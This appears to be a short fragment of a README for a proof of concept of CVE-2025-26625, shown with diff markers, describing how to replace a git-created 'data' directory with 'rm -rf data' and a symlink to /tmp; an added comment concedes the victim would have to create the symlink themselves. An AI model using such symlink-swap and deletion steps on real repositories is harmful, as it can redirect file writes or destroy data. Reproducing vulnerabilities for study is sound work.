Mitchellzhou1/CVE_2025_26625/README.md

 # At this point git has created "data" (a directory) and a pointer file or placeholder.
 # Now remove the directory and replace it with a symlink to /tmp (or another safe path)
+# yeah... the victim will need to create the symblink and pwn themselves...
 rm -rf data
 ln -s /tmp data